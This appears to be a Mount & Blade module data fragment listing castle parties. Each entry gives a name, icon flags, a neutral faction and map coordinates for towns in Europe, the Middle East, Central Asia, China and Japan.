("turku", "Turku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-13.64, -498.88), []),
("kalmar", "Kalmar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (52.6, -429.82), [], 95.0),
("varberg", "Varberg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (95.92, -444.0), [], 45.0),
("tingsryd", "Tingsryd", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (65.24, -423.92), [], 60.0),
("stockholm", "Stockholm", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (31.6, -477.6), [], 15.0),
("karlstad", "Karlstad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (81.6, -478.72), [], 35.0),
("tallinn", "Tallinn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-40.48, -479.4), [], 90.0),
("linkoping", "Linkoping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.92, -459.2), [], 225.0),
("salo", "Salo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-23.2, -498.0), [], 15.0),
("orebro", "Orebro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (63.24, -476.24), [], 85.0),
("damascus", "Damascus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -102.76), [], 310.0),
("alexandria", "Alexandria", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-97.6, -75.8456), []),
("cairo", "Cairo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-111.56, -63.6), [], 75.0),
("kaerak", "Kaerak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-158.0, -72.4), [], 260.0),
("damietta", "Damietta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-116.76, -79.0), [], 45.0),
("benghazi", "Benghazi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.4, -85.96), [], 45.0),
("aqaba", "Aqaba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.32, -59.56), [], 260.0),
("al_arish", "Al Arish", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-143.6, -75.2), [], 125.0),
("suwayda", "Suwayda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-175.36, -87.16), [], 265.0),
("mecca", "Mecca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-205.48, 29.96), [], 80.0),
("medinah", "Medinah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-203.04, -2.6), [], 90.0),
("sanaa", "Sanaa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-253.16, 91.88), [], 180.0),
("aswan", "Aswan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.8, 1.44), [], 270.0),
("asyut", "Asyut", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-108.98, -31.32), [], 75.0),
("tubruq", "Tubruq", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-31.56, -86.48), [], 195.0),
("amadabad", "Amadabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-243.52, -58.88), [], 95.0),
("abha", "Abha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-234.8, 62.52), [], 95.0),
("arar", "Arar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-218.36, -73.84), [], 315.0),
("riyadh", "Jeddah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-198.96, -28.2), [], 95.0),
("riyadh", "Jeddah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-198.96, -28.2), [], 95.0),
("shah_kaka", "Shah Kaka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-209.36, -62.8), [], 40.0),
("beni_suef", "Beni suef", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-110.8, -52.4), [], 45.0),
("tabuk", "Tabuk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-169.76, -44.52), [], 180.0),
("tanta", "Tanta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-108.76, -71.76), [], 90.0),
("el_daba", "El Daba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-78.84, -74.76), [], 180.0),
("suez", "Suez", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.12, -64.5), [], 35.0),
("luxor", "Luxor", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-126.74, -14.58), [], 180.0),
("amman", "Amman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-163.08, -84.88), [], 260.0),
("adabiyah", "Adabiyah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.4, -71.72), [], 180.0),
("al_madiq", "Al madiq", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.12, -5.16), [], 55.0),
("buraydah", "Buraydah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-250.64, -22.8), [], 255.0),
("yanbu", "Yanbu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-187.6, 0.8), [], 45.0),
("aden", "Aden", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-261.56, 115.76), [], 45.0),
("tayma", "Tayma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-191.12, -36.6), [], 270.0),
("derna", "Derna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-17.28, -94.08), [], 140.0),
("samalut", "Samalut", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.16, -44.18), []),
("wadi_addawasir", "Wadi addawasir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.6, 39.4), [], 185.0),
("hail", "Hail", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-225.64, -35.4), [], 80.0),
("deir_ez_zur", "Deir ez-zur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-208.48, -124.4), [], 45.0),
("samarkand", "Samarkand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-501.2, -177.2), [], 155.0),
("nishapur", "Nishapur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-412.68, -135.6), [], 80.0),
("kabul", "Kabul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-526.0, -114.88), [], 35.0),
("mazarisharif", "MazariSharif", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-503.84, -140.64), [], 245.0),
("taraz", "Taraz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-550.12, -218.92), [], 215.0),
("ashgabat", "Ashgabat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-407.84, -156.16), [], 45.0),
("aktau", "Aktau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-330.72, -230.72), [], 115.0),
("baku", "Baku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-314.8, -188.0), [], 95.0),
("bishukec", "Bishukec", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-585.04, -218.68), [], 10.0),
("tashkent", "Tashkent", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-526.684, -197.6), [], 160.0),
("urgench", "Urgench", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-429.88, -199.72), [], 40.0),
("shymkent", "Shymkent", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-530.72, -211.48), [], 20.0),
("mary", "Mary", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-445.8, -152.12), []),
("gizab", "Gizab", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-493.84, -102.56), [], 275.0),
("zhanaozen", "Zhanaozen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-347.84, -225.6), [], 175.0),
("shirvan", "Shirvan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-304.72, -181.32), [], 45.0),
("gdansk", "Gdansk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -388.64), [], 120.0),
("poznan", "Poznan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (44.4, -357.2), [], 260.0),
("krakow", "Krakow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (11.6, -321.12), [], 260.0),
("warsaw", "Warsaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1.12, -348.12), [], 185.0),
("lublin", "Lublin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-17.2, -338.96), [], 180.0),
("szczecin", "Szczecin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (70.32, -374.08), [], 175.0),
("bialystok", "Bialystok", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-23.4, -368.8), []),
("rzeszow", "Rzeszow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-10.68, -320.0), []),
("bydgoszcz", "Bydgoszcz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (32.72, -368.48), [], 315.0),
("lodz", "Lodz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (16.76, -347.2), [], 100.0),
("wroclaw", "Wroclaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (43.24, -337.2), [], 100.0),
("opole", "Opole", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (33.72, -330.48), [], 260.0),
("gorzow", "Gorzow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.84, -363.68), [], 115.0),
("elk", "Elk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-14.32, -379.48), [], 90.0),
("koszalin", "Koszalin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (53.04, -385.28), [], 255.0),
("olsztyn", "Olsztyn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.76, -377.08), []),
("kielce", "Kielce", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.24, -332.52), [], 155.0),
("konin", "Konin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (30.2, -354.04), [], 45.0),
("siedlce", "Siedlce", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-13.92, -352.8), [], 225.0),
("vilnius", "Vilnius", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-46.76, -394.76), [], 90.0),
("kaunas", "Kaunas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.0, -398.4), [], 15.0),
("kelme", "Kelme", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-14.0, -412.0), [], 10.0),
("hrodna", "Hrodna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-30.8, -377.28), [], 125.0),
("lida", "Lida", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-47.4, -381.12), [], 90.0),
("baranavichy", "Baranavichy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-54.56, -368.8), [], 45.0),
("siauliai", "Siauliai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-24.92, -416.4), [], 240.0),
("pinsk", "Pinsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-54.32, -352.72), [], 45.0),
("xuzhou", "Xuzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1054.78, -111.58), [], 290.0),
("pizhou", "Pizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.52, -112.88), [], 60.0),
("huaian", "Huaian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1070.24, -104.72), [], 180.0),
("lianyungang", "Lianyungang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.76, -115.84), [], 45.0),
("linyi", "Linyi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1063.32, -121.76), [], 80.0),
("london", "London", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (230.48, -343.36), [], 180.0),
("bordeaux", "Bordeaux", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (238.22, -249.12), [], 255.0),
("york", "York", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.08, -382.72), [], 90.0),
("nante", "Nante", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (247.64, -280.22), [], 235.0),
("bristol", "Bristol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (257.48, -342.32), [], 260.0),
("chester", "Chester", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (259.2, -369.6), [], 90.0),
("bamber", "Bamber", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.8, -398.4), [], 45.0),
("dublin", "Dublin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.8, -372.4), [], 90.0),
("hastings", "Hastings", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (222.4, -334.8), [], 180.0),
("hawick", "Hawick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (259.6, -406.64), [], 280.0),
("portsmouth", "Portsmouth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.08, -333.16), [], 75.0),
("limoges", "Limoges", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (215.2, -259.0), [], 140.0),
("plymouth", "Plymouth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (274.76, -325.68), [], 65.0),
("norwich", "Norwich", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (215.8, -360.84), [], 125.0),
("northamton", "Northamton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (238.92, -353.4), [], 275.0),
("nottingham", "Nottingham", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.68, -366.08), [], 315.0),
("sheffield", "Sheffield", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (245.52, -373.36), [], 20.0),
("cardiff", "Cardiff", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (264.8, -343.4), [], 80.0),
("blackpool", "Blackpool", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.92, -379.72), [], 35.0),
("wolverhampton", "Wolverhampton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (253.12, -358.4), []),
("brest", "Brest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.88, -293.64), [], 45.0),
("maan", "Maan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (278.88, -386.8), [], 20.0),
("derby", "Derby", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.24, -365.32), [], 55.0),
("southampton", "Southampton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (244.64, -334.0), [], 15.0),
("cahors", "Cahors", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (214.12, -242.12), [], 35.0),
("poitiers", "Poitiers", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (227.28, -272.08), [], 160.0),
("rennes", "Rennes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (247.12, -292.76), []),
("exeter", "Exeter", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (268.24, -330.72), [], 90.0),
("cambridge", "Cambridge", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (228.44, -352.44), [], 180.0),
("colchester", "Colchester", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (220.24, -349.88), [], 45.0),
("aberystwyth", "Aberystwyth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.28, -358.04), [], 315.0),
("dungannon", "Dungannon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.76, -398.2), [], 125.0),
("la_lochelle", "La lochelle", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.8, -264.24), [], 90.0),
("nanjing", "Nanjing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.96, -86.16), []),
("shaoxing", "Shaoxing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.36, -63.8), [], 45.0),
("suzhou", "Suzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.68, -78.0), [], 225.0),
("shanghai", "Shanghai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1097.24, -77.32), [], 130.0),
("yizhou", "Yizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1092.8, 2.4), [], 90.0),
("wenzhou", "Wenzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1088.4, -39.86), [], 170.0),
("nanping", "Nanping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1061.24, -26.72), [], 80.0),
("yancheng", "Yancheng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1082.72, -101.52), [], 110.0),
("ningbo", "Ningbo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1097.68, -62.0), [], 115.0),
("jinhua", "Jinhua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1077.16, -53.12), [], 45.0),
("shanyue", "Shanyue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1066.4, -66.28), [], 185.0),
("kyoto", "Kyoto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1253.6, -121.08), [], 240.0),
("edo", "Edo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1296.4, -129.12), [], 90.0),
("nagasaki", "Nagasaki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1189.2, -95.2), [], 80.0),
("hiroshima", "Hiroshima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1216.8, -114.4), [], 260.0),
("osaka", "Osaka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1251.36, -115.58), [], 45.0),
("sendai", "Sendai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1309.24, -160.48), [], 125.0),
("nagano", "Nagano", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1280.4, -143.2), [], 45.0),
("tokushima", "Tokushima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1240.2, -109.52), [], 280.0),
("morioka", "Morioka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1312.44, -178.4), [], 90.0),
("fukuoka", "Fukuoka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1194.68, -104.76), [], 315.0),
("kagoshima", "Kagoshima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1196.28, -81.2), [], 125.0),
("matsuyama", "Matsuyama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1220.94, -106.92), [], 185.0),
("matsue", "Matsue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1224.16, -125.32), [], 45.0),
("takayama", "Takayama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1271.38, -134.06), [], 155.0),
("utsunomiya", "Utsunomiya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1298.4, -139.32), [], 245.0),
("sapporo", "Sapporo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1314.8, -221.92), [], 120.0),
("kobayashi", "Kobayashi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1198.92, -84.56), [], 130.0),
("tottori", "Tottori", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1239.0, -126.28), [], 170.0),
("nagoya", "Nagoya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1266.44, -122.92), [], 45.0),
("fukushima", "Fukushima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1304.76, -153.8), [], 110.0),
("akita", "Akita", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1301.64, -178.88), [], 120.0),
("amami", "Amami", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1183.64, -44.12), [], 90.0),
("shizuoka", "Shizuoka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1281.6, -121.2), [], 180.0),
("katsuyama", "Katsuyama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1260.0, -133.48), [], 100.0),
("yamaguchi", "Yamaguchi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1206.4, -111.2), [], 45.0),
("aomori", "Aomori", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1307.92, -191.76), [], 45.0),
("oita", "Oita", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1207.8, -99.78), [], 25.0),
("miyazaki", "Miyazaki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1205.48, -85.04), [], 180.0),
("kochi", "Kochi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1228.76, -104.32), [], 85.0),
("okayama", "Okayama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1233.16, -116.96), [], 315.0),
("niigata", "Niigata", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.18, -154.9), [], 255.0),
("maebashi", "Maebashi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.32, -137.24), []),
("ryukyu", "Ryukyu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1167.2, -24.4), [], 145.0),
("gorgonac", "Gorgonac", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1036.4, -290.4), [], 55.0),
("olkhunuud", "Olkhunuud", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-978.4, -232.4), [], 25.0),
